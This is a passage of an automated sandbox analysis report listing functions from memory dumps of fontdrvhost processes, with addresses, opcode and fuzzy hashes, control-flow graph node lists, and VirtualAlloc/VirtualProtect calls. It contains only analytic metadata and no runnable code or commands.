                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D3DB8 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51656e1e349ffeb4c6151966cb611ee3d4930c60049d44a7b6720c6a7319dba0
                                                                    • Instruction ID: 16a7498743122a857a47258eba75508afe5a92e5f404c02510a09e5076aafcaa
                                                                    • Opcode Fuzzy Hash: 51656e1e349ffeb4c6151966cb611ee3d4930c60049d44a7b6720c6a7319dba0
                                                                    • Instruction Fuzzy Hash: 6FE0C210B0A24722FE3014E24C6D8BF2E39CF937C5F100639F00D1308AFE982803B2A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D7635 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25412e8a99d30e0f632988ef88b82f8f3fa1083cd54197db5ade967f506e7e87
                                                                    • Instruction ID: b3f9949a69987fb322e98eb811675a2b2da37d9da5e26a438a6d1b20371dbafe
                                                                    • Opcode Fuzzy Hash: 25412e8a99d30e0f632988ef88b82f8f3fa1083cd54197db5ade967f506e7e87
                                                                    • Instruction Fuzzy Hash: 2CE09A3181D38A8BD7619B6888B64EC7B30AF00340F5802EAF90C46186FB246618A642
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00007FFD9C0D6630 Relevance: 11.6, Strings: 9, Instructions: 383COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^$^^$^^$^^$^^$^^$^^$^^$^^
                                                                    • API String ID: 0-4142995909
                                                                    • Opcode ID: cace15e04305a79683012b1c1cf1220d9ebd4702cbd5b97724fc3d84defc1a8e
                                                                    • Instruction ID: 5b4d96e6c7b45b2f628f48de49ef7c47d9bcb9251fe6099d15364e7aee9f3750
                                                                    • Opcode Fuzzy Hash: cace15e04305a79683012b1c1cf1220d9ebd4702cbd5b97724fc3d84defc1a8e
                                                                    • Instruction Fuzzy Hash: F1C16813B0D2A356F71277ACA8F58E66FE09F022A8B1946F7F4DE4D0D3AD0E294D4185
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D6A78 Relevance: 8.9, Strings: 7, Instructions: 175COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^$^^$^^$^^$^^$^^$^^
                                                                    • API String ID: 0-3751555822
                                                                    • Opcode ID: 8bc28a803eb6cdd4c7b2c049a1173e7b25fa30ac99da2cc4cba8b5e5ed0dc3c8
                                                                    • Instruction ID: 1970be964308de32186457d962ae8a906293591d3ec01484213dbb04b6b5c8f6
                                                                    • Opcode Fuzzy Hash: 8bc28a803eb6cdd4c7b2c049a1173e7b25fa30ac99da2cc4cba8b5e5ed0dc3c8
                                                                    • Instruction Fuzzy Hash: 3B513852B0D2A316F71677BCA8F6CE62FE08F11268B0942F3E4DE490D3AD0F24994585
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D61FC Relevance: 5.2, Strings: 4, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^$^^$^^$^^
                                                                    • API String ID: 0-2660549292
                                                                    • Opcode ID: d78542ff4fa670b014a32bd94082195b3f9fa796e1e22571a2ae76c6759acc88
                                                                    • Instruction ID: cf0b8fec7d51771eb3b7151afc4012aa5d34bdd0875b2d3fb7e017b68a521f55
                                                                    • Opcode Fuzzy Hash: d78542ff4fa670b014a32bd94082195b3f9fa796e1e22571a2ae76c6759acc88
                                                                    • Instruction Fuzzy Hash: E6617A43B0D7A315F76273BC24B28E56FA08F126A4B0D46F7E5DE490D76D0A284E5285
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:5.5%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:6
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 14869 7ffd9ba2201e 14870 7ffd9ba2202d VirtualProtect 14869->14870 14872 7ffd9ba2216d 14870->14872 14865 7ffd9ba23a0d 14866 7ffd9ba23a2f VirtualAlloc 14865->14866 14868 7ffd9ba23b45 14866->14868

                                                                    Executed Functions

                                                                    Function 00007FFD9BA2B7ED Relevance: 2.5, Strings: 1, Instructions: 1252COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ffd9ba2b7ed-7ffd9ba2b828 1 7ffd9ba2b82f-7ffd9ba2b88f 0->1 2 7ffd9ba2b82a 0->2 6 7ffd9ba2b89d-7ffd9ba2b8ac 1->6 7 7ffd9ba2b891 1->7 2->1 8 7ffd9ba2b8ae 6->8 9 7ffd9ba2b8b3-7ffd9ba2b8bc 6->9 7->6 8->9 10 7ffd9ba2b8be-7ffd9ba2b8cd 9->10 11 7ffd9ba2b8e9-7ffd9ba2b944 9->11 12 7ffd9ba2b8cf 10->12 13 7ffd9ba2b8d4-7ffd9ba2d255 call 7ffd9ba2e476 10->13 21 7ffd9ba2b946 11->21 22 7ffd9ba2b94b-7ffd9ba2bbe4 11->22 12->13 19 7ffd9ba2d260-7ffd9ba2d333 13->19 21->22 55 7ffd9ba2c8ce-7ffd9ba2c8db 22->55 56 7ffd9ba2c8e1-7ffd9ba2c8fe 55->56 57 7ffd9ba2bbe9-7ffd9ba2bbf7 55->57 62 7ffd9ba2c906-7ffd9ba2c923 56->62 58 7ffd9ba2bbfe-7ffd9ba2bd52 57->58 59 7ffd9ba2bbf9 57->59 103 7ffd9ba2bd9f-7ffd9ba2be52 58->103 104 7ffd9ba2bd54-7ffd9ba2bd99 58->104 59->58 66 7ffd9ba2c9e0-7ffd9ba2c9e6 62->66 68 7ffd9ba2c928-7ffd9ba2c985 66->68 69 7ffd9ba2c9ec-7ffd9ba2ca2e 66->69 80 7ffd9ba2c9b2-7ffd9ba2c9dd 68->80 81 7ffd9ba2c987-7ffd9ba2c98b 68->81 79 7ffd9ba2cc7c-7ffd9ba2cc82 69->79 83 7ffd9ba2ca33-7ffd9ba2cb7b 79->83 84 7ffd9ba2cc88-7ffd9ba2cce1 79->84 80->66 81->80 85 7ffd9ba2c98d-7ffd9ba2c9af 81->85 136 7ffd9ba2cc0d-7ffd9ba2cc11 83->136 137 7ffd9ba2cb81-7ffd9ba2cc0b 83->137 93 7ffd9ba2cd70-7ffd9ba2cdc7 84->93 94 7ffd9ba2cce7-7ffd9ba2cd33 84->94 85->80 115 7ffd9ba2d227-7ffd9ba2d22d 93->115 138 7ffd9ba2be54-7ffd9ba2be5c 103->138 139 7ffd9ba2be61-7ffd9ba2bf0f 103->139 104->103 118 7ffd9ba2d233-7ffd9ba2d25f call 7ffd9ba2e476 115->118 119 7ffd9ba2cdcc-7ffd9ba2ce6a 115->119 118->19 149 7ffd9ba2ce6c-7ffd9ba2ce8f 119->149 150 7ffd9ba2ce9a-7ffd9ba2cea9 119->150 140 7ffd9ba2cc13-7ffd9ba2cc45 136->140 141 7ffd9ba2cc47-7ffd9ba2cc5a 136->141 152 7ffd9ba2cc5b-7ffd9ba2cc79 137->152 142 7ffd9ba2c8b9-7ffd9ba2c8cb 138->142 176 7ffd9ba2bf1e-7ffd9ba2bfcc 139->176 177 7ffd9ba2bf11-7ffd9ba2bf19 139->177 140->152 141->152 142->55 149->150 154 7ffd9ba2ceb0-7ffd9ba2cebf 150->154 155 7ffd9ba2ceab 150->155 152->79 156 7ffd9ba2ced4-7ffd9ba2ceef 154->156 157 7ffd9ba2cec1-7ffd9ba2cecf 154->157 155->154 161 7ffd9ba2cf0f-7ffd9ba2d1fb 156->161 162 7ffd9ba2cef1-7ffd9ba2cf0b 156->162 160 7ffd9ba2d206-7ffd9ba2d224 157->160 160->115 161->160 162->161 185 7ffd9ba2bfce-7ffd9ba2bfd6 176->185 186 7ffd9ba2bfdb-7ffd9ba2c089 176->186 177->142 185->142 194 7ffd9ba2c098-7ffd9ba2c0a3 186->194 195 7ffd9ba2c08b-7ffd9ba2c093 186->195 194->142 195->142
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: jV_H
                                                                    • API String ID: 0-1489637952
                                                                    • Opcode ID: d288f46504e238a1e393a302cd0698cdc9b2ab7f04c42c04f92a8905205c2778
                                                                    • Instruction ID: 2072bc77053b31bcf0cb3eef97c15a0fea168c6cd5f1e7080c4b15683664611d
                                                                    • Opcode Fuzzy Hash: d288f46504e238a1e393a302cd0698cdc9b2ab7f04c42c04f92a8905205c2778
                                                                    • Instruction Fuzzy Hash: 68B2FB70E09A1D8FDBA8EF58C8A5AA9B7B1FB58300F5041E9D40DD3296DE756E81CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10DA8 Relevance: .3, Instructions: 297COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 915 7ffd9ba10da8-7ffd9ba10dbf 916 7ffd9ba10dc1 915->916 917 7ffd9ba10dc2-7ffd9ba10df9 915->917 916->917 919 7ffd9ba10e00-7ffd9ba10eb7 call 7ffd9ba107d0 917->919 920 7ffd9ba10dfb 917->920 933 7ffd9ba10ecf-7ffd9ba10fa8 919->933 934 7ffd9ba10eb9-7ffd9ba10ece 919->934 920->919 947 7ffd9ba10fc0-7ffd9ba10fc1 933->947 948 7ffd9ba10faa-7ffd9ba10fb0 933->948 934->933 949 7ffd9ba10fb2 947->949 950 7ffd9ba10fc3 947->950 948->949 951 7ffd9ba10fc5-7ffd9ba10fe3 949->951 952 7ffd9ba10fb4-7ffd9ba10fbe 949->952 950->951 955 7ffd9ba10feb-7ffd9ba110dc 951->955 952->947
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d89593a328486b66078c57e7823f3db8d5030b1894d80d1f51838a9379d96b63
                                                                    • Instruction ID: 4b8b14f1551fe4f535e9d5a101ca9308bce37d6fa560b9650420e3d148cf2952
                                                                    • Opcode Fuzzy Hash: d89593a328486b66078c57e7823f3db8d5030b1894d80d1f51838a9379d96b63
                                                                    • Instruction Fuzzy Hash: 6AA1CE71A0DA8D8FE7A8EB68C8657E97BE1FF55310F0002BAD049D72E6CB792811C714
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA2C0A8 Relevance: 2.0, Strings: 1, Instructions: 718COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 197 7ffd9ba2c0a8-7ffd9ba2c146 204 7ffd9ba2c148-7ffd9ba2c150 197->204 205 7ffd9ba2c155-7ffd9ba2c203 197->205 206 7ffd9ba2c8b9-7ffd9ba2c8db 204->206 230 7ffd9ba2c212-7ffd9ba2c2c0 205->230 231 7ffd9ba2c205-7ffd9ba2c20d 205->231 210 7ffd9ba2c8e1-7ffd9ba2c8fe 206->210 211 7ffd9ba2bbe9-7ffd9ba2bbf7 206->211 218 7ffd9ba2c906-7ffd9ba2c923 210->218 213 7ffd9ba2bbfe-7ffd9ba2bd52 211->213 214 7ffd9ba2bbf9 211->214 274 7ffd9ba2bd9f-7ffd9ba2be52 213->274 275 7ffd9ba2bd54-7ffd9ba2bd99 213->275 214->213 223 7ffd9ba2c9e0-7ffd9ba2c9e6 218->223 226 7ffd9ba2c928-7ffd9ba2c985 223->226 227 7ffd9ba2c9ec-7ffd9ba2ca2e 223->227 244 7ffd9ba2c9b2-7ffd9ba2c9dd 226->244 245 7ffd9ba2c987-7ffd9ba2c98b 226->245 243 7ffd9ba2cc7c-7ffd9ba2cc82 227->243 270 7ffd9ba2c2cf-7ffd9ba2c37d 230->270 271 7ffd9ba2c2c2-7ffd9ba2c2ca 230->271 231->206 247 7ffd9ba2ca33-7ffd9ba2cb7b 243->247 248 7ffd9ba2cc88-7ffd9ba2cce1 243->248 244->223 245->244 249 7ffd9ba2c98d-7ffd9ba2c9af 245->249 313 7ffd9ba2cc0d-7ffd9ba2cc11 247->313 314 7ffd9ba2cb81-7ffd9ba2cc0b 247->314 260 7ffd9ba2cd70-7ffd9ba2cdc7 248->260 261 7ffd9ba2cce7-7ffd9ba2cd33 248->261 249->244 288 7ffd9ba2d227-7ffd9ba2d22d 260->288 316 7ffd9ba2c37f-7ffd9ba2c387 270->316 317 7ffd9ba2c38c-7ffd9ba2c43a 270->317 271->206 318 7ffd9ba2be54-7ffd9ba2be5c 274->318 319 7ffd9ba2be61-7ffd9ba2bf0f 274->319 275->274 291 7ffd9ba2d233-7ffd9ba2d333 call 7ffd9ba2e476 288->291 292 7ffd9ba2cdcc-7ffd9ba2ce6a 288->292 331 7ffd9ba2ce6c-7ffd9ba2ce8f 292->331 332 7ffd9ba2ce9a-7ffd9ba2cea9 292->332 320 7ffd9ba2cc13-7ffd9ba2cc45 313->320 321 7ffd9ba2cc47-7ffd9ba2cc5a 313->321 336 7ffd9ba2cc5b-7ffd9ba2cc79 314->336 316->206 367 7ffd9ba2c43c-7ffd9ba2c444 317->367 368 7ffd9ba2c449-7ffd9ba2c4f7 317->368 318->206 372 7ffd9ba2bf1e-7ffd9ba2bfcc 319->372 373 7ffd9ba2bf11-7ffd9ba2bf19 319->373 320->336 321->336 331->332 338 7ffd9ba2ceb0-7ffd9ba2cebf 332->338 339 7ffd9ba2ceab 332->339 336->243 341 7ffd9ba2ced4-7ffd9ba2ceef 338->341 342 7ffd9ba2cec1-7ffd9ba2cecf 338->342 339->338 348 7ffd9ba2cf0f-7ffd9ba2d1fb 341->348 349 7ffd9ba2cef1-7ffd9ba2cf0b 341->349 347 7ffd9ba2d206-7ffd9ba2d224 342->347 347->288 348->347 349->348 367->206 386 7ffd9ba2c506-7ffd9ba2c511 368->386 387 7ffd9ba2c4f9-7ffd9ba2c501 368->387 390 7ffd9ba2bfce-7ffd9ba2bfd6 372->390 391 7ffd9ba2bfdb-7ffd9ba2c089 372->391 373->206 392 7ffd9ba2c513-7ffd9ba2c570 386->392 393 7ffd9ba2c572-7ffd9ba2c5b4 386->393 387->206 390->206 412 7ffd9ba2c098-7ffd9ba2c0a3 391->412 413 7ffd9ba2c08b-7ffd9ba2c093 391->413 392->393 402 7ffd9ba2c5c3-7ffd9ba2c671 393->402 403 7ffd9ba2c5b6-7ffd9ba2c5be 393->403 419 7ffd9ba2c680-7ffd9ba2c72e 402->419 420 7ffd9ba2c673-7ffd9ba2c67b 402->420 403->206 412->206 413->206 428 7ffd9ba2c730-7ffd9ba2c738 419->428 429 7ffd9ba2c73d-7ffd9ba2c7eb 419->429 420->206 428->206 437 7ffd9ba2c7ed-7ffd9ba2c7f5 429->437 438 7ffd9ba2c7fa-7ffd9ba2c8a8 429->438 437->206 446 7ffd9ba2c8b4-7ffd9ba2c8b6 438->446 447 7ffd9ba2c8aa-7ffd9ba2c8b2 438->447 446->206 447->206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^V_H
                                                                    • API String ID: 0-662928822
                                                                    • Opcode ID: 20db5b18fb26e3bc2e394c31b0bcf39591407d23fe9079a041fda2130f7db1d6
                                                                    • Instruction ID: 5df2d6b1043a778f946450668a867e791b5995ae35d7818e2328e78865236dd5
                                                                    • Opcode Fuzzy Hash: 20db5b18fb26e3bc2e394c31b0bcf39591407d23fe9079a041fda2130f7db1d6
                                                                    • Instruction Fuzzy Hash: C9522D71E5A92D8FDBA4EB5888A57E8B7F1FB58300F4401F9D04D93292DA786E81CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA2201E Relevance: 1.7, APIs: 1, Instructions: 193memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 448 7ffd9ba2201e-7ffd9ba2202b 449 7ffd9ba2202d-7ffd9ba22035 448->449 450 7ffd9ba22036-7ffd9ba22047 448->450 449->450 451 7ffd9ba22052-7ffd9ba2216b VirtualProtect 450->451 452 7ffd9ba22049-7ffd9ba22051 450->452 457 7ffd9ba2216d 451->457 458 7ffd9ba22173-7ffd9ba221c3 451->458 452->451 457->458
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1F000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1f000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 437b0cf27f1402a76d068fb825104d1fb83e819bd73e5a23a2583a8741b64b47
                                                                    • Instruction ID: decd4e8e4958f0e66dfbd15c1a8fd0486b47a055c7627438048a523aaae367dc
                                                                    • Opcode Fuzzy Hash: 437b0cf27f1402a76d068fb825104d1fb83e819bd73e5a23a2583a8741b64b47
                                                                    • Instruction Fuzzy Hash: 3A517D30D0974D8FDB54DFA8C885AEDBBF1FB6A310F10426AD449E7256DB74A885CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA23A0D Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 461 7ffd9ba23a0d-7ffd9ba23b43 VirtualAlloc 466 7ffd9ba23b45 461->466 467 7ffd9ba23b4b-7ffd9ba23baf 461->467 466->467
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1F000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1f000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 4086384b7e09648d90470e67ae09543c18db0fe9f5bc8ada959aaac9b8e4c90c
                                                                    • Instruction ID: d5509000d1ad6838a3a238e64c78fc94df7f9c946bd2553418ff02f5fc5585a2
                                                                    • Opcode Fuzzy Hash: 4086384b7e09648d90470e67ae09543c18db0fe9f5bc8ada959aaac9b8e4c90c
                                                                    • Instruction Fuzzy Hash: F5514D74908A5C8FDF94EF58C885BE9BBF1FB69310F1041AAD04DE3255CB71A9858F40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA26761 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 471 7ffd9ba26761-7ffd9ba2678a 473 7ffd9ba26794-7ffd9ba267ac 471->473 474 7ffd9ba267b7-7ffd9ba267be 473->474 475 7ffd9ba267de-7ffd9ba26f21 474->475 476 7ffd9ba267c0-7ffd9ba26cdb 474->476 475->474 476->474 483 7ffd9ba26ce1-7ffd9ba26ceb 476->483 483->474
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba26000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *
                                                                    • API String ID: 0-163128923
                                                                    • Opcode ID: 875c773fc31e80eaa2fc80a47191f9681ada53b299b17ddb9c974e275b8731b8
                                                                    • Instruction ID: fb9ea4a3083aaa8c51b1c9cf815025559279275a9cd1c78ba2d3b8bc96e693f2
                                                                    • Opcode Fuzzy Hash: 875c773fc31e80eaa2fc80a47191f9681ada53b299b17ddb9c974e275b8731b8
                                                                    • Instruction Fuzzy Hash: 8311A570E5A51D8FEBB8DB48D8A4BE8B7A1FB58304F1001E9D10ED2295CA786B818B55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA2684D Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 484 7ffd9ba2684d-7ffd9ba26856 486 7ffd9ba26861-7ffd9ba26880 484->486 487 7ffd9ba267b7-7ffd9ba267be 486->487 488 7ffd9ba267de-7ffd9ba26f21 487->488 489 7ffd9ba267c0-7ffd9ba26cdb 487->489 488->487 489->487 496 7ffd9ba26ce1-7ffd9ba26ceb 489->496 496->487
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA26000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA26000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba26000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *
                                                                    • API String ID: 0-163128923
                                                                    • Opcode ID: 9ecdeb18057becfe9f1ec89054307b1c2350af4d17ce54e14a77853ad85f5028
                                                                    • Instruction ID: 670cd8a7d7444da464fb3e5de28c011d638adc880219aa4e689435dcdd04400e
                                                                    • Opcode Fuzzy Hash: 9ecdeb18057becfe9f1ec89054307b1c2350af4d17ce54e14a77853ad85f5028
                                                                    • Instruction Fuzzy Hash: F7F05E71E4941E8FEB3DDF08C8647E8B3A1EF64310F1542F9D10D922A4DB786B858B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5D26D Relevance: .4, Instructions: 436COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae5cd188c6bf255d33ed579536ccd0eee3b2ccf5ee1ca933e35a4f550512b1c0
                                                                    • Instruction ID: f1d504e216a979ffabec8080d6fbf886b6dd2e2b66de80d8d2eecac4957f64a2
                                                                    • Opcode Fuzzy Hash: ae5cd188c6bf255d33ed579536ccd0eee3b2ccf5ee1ca933e35a4f550512b1c0
                                                                    • Instruction Fuzzy Hash: 56F17171E2965D8FDBA8EB98C4A5BACB7B1FF54300F4541B9D04DD3292CEB46A84CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5B8A9 Relevance: .2, Instructions: 160COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1020 7ffd9ba5b8a9-7ffd9ba5b8fe 1022 7ffd9ba5b900 1020->1022 1023 7ffd9ba5b905-7ffd9ba5b912 1020->1023 1022->1023 1025 7ffd9ba5b915-7ffd9ba5b919 1023->1025 1026 7ffd9ba5b91b-7ffd9ba5b988 1025->1026 1027 7ffd9ba5b936-7ffd9ba5b9ad 1025->1027 1026->1025 1038 7ffd9ba5b98a-7ffd9ba5b98f 1026->1038 1031 7ffd9ba5b9af-7ffd9ba5b9b9 1027->1031 1032 7ffd9ba5ba1a-7ffd9ba5ba5a call 7ffd9ba5b1c0 1027->1032 1035 7ffd9ba5b9c5-7ffd9ba5b9ed 1031->1035 1041 7ffd9ba5ba63-7ffd9ba5ba67 1032->1041 1042 7ffd9ba5ba5c-7ffd9ba5ba61 1032->1042 1039 7ffd9ba5b9ef-7ffd9ba5b9f4 1035->1039 1040 7ffd9ba5b9f6-7ffd9ba5b9fa 1035->1040 1038->1025 1039->1040 1045 7ffd9ba5b9fe-7ffd9ba5b9ff 1040->1045 1046 7ffd9ba5b9fc 1040->1046 1043 7ffd9ba5ba84-7ffd9ba5c0ee 1041->1043 1044 7ffd9ba5ba69-7ffd9ba5bbe1 call 7ffd9ba5b260 1041->1044 1042->1041 1043->1041 1055 7ffd9ba5c0f4-7ffd9ba5c0fb 1043->1055 1044->1041 1059 7ffd9ba5bbe7-7ffd9ba5bbec 1044->1059 1048 7ffd9ba5ba01-7ffd9ba5ba18 1045->1048 1046->1048 1048->1032 1055->1041 1059->1041
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe9c590340ad6540c78634df0d1555aca33563381587206efccd6bb2cee4d2ff
                                                                    • Instruction ID: dde895a877d66d1d1a84068f51615e60cac2509a98511d5e7a5dd325a953e785
                                                                    • Opcode Fuzzy Hash: fe9c590340ad6540c78634df0d1555aca33563381587206efccd6bb2cee4d2ff
                                                                    • Instruction Fuzzy Hash: E1516C70E0A64D8FEB69DF94C8A47EC77B1FB58301F5101BAD009D72A5DBB86A85CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA28B09 Relevance: .1, Instructions: 138COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1083 7ffd9ba28b09-7ffd9ba28b54 1085 7ffd9ba28b56 1083->1085 1086 7ffd9ba28b5b-7ffd9ba28b61 1083->1086 1085->1086 1087 7ffd9ba28c35-7ffd9ba28c3b 1086->1087 1088 7ffd9ba28c41-7ffd9ba28c4a 1087->1088 1089 7ffd9ba28b66-7ffd9ba28b9c 1087->1089 1091 7ffd9ba28ba2-7ffd9ba28c0f 1089->1091 1096 7ffd9ba28c2d-7ffd9ba28c32 1091->1096 1097 7ffd9ba28c11-7ffd9ba28c1a 1091->1097 1096->1087 1097->1096 1098 7ffd9ba28c1c-7ffd9ba28c2c 1097->1098
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
